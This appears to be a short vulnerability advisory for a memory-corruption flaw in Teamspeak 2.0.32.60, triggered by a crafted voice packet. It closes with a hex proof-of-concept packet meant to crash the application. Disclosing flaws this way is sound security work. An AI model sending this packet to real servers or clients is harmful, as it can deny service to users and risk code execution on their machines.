14 lines
No EOL
664 B
Text
14 lines
No EOL
664 B
Text
source: https://www.securityfocus.com/bid/44502/info
|
|
|
|
Teamspeak is prone to a memory-corruption vulnerability.
|
|
|
|
Attackers can exploit this issue by sending a specially crafted voice transmission packet containing malicious data.
|
|
|
|
Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploit attempts will result in a denial-of-service condition.
|
|
|
|
Teamspeak version 2.0.32.60 is vulnerable.
|
|
|
|
The following proof-of-concept packet is available:
|
|
f2be000426ad7e00300000000001000a414141414141414141424141414141
|
|
4141414141414141414141414141414141414100ff99414141424242424141
|
|
414141414141414141 |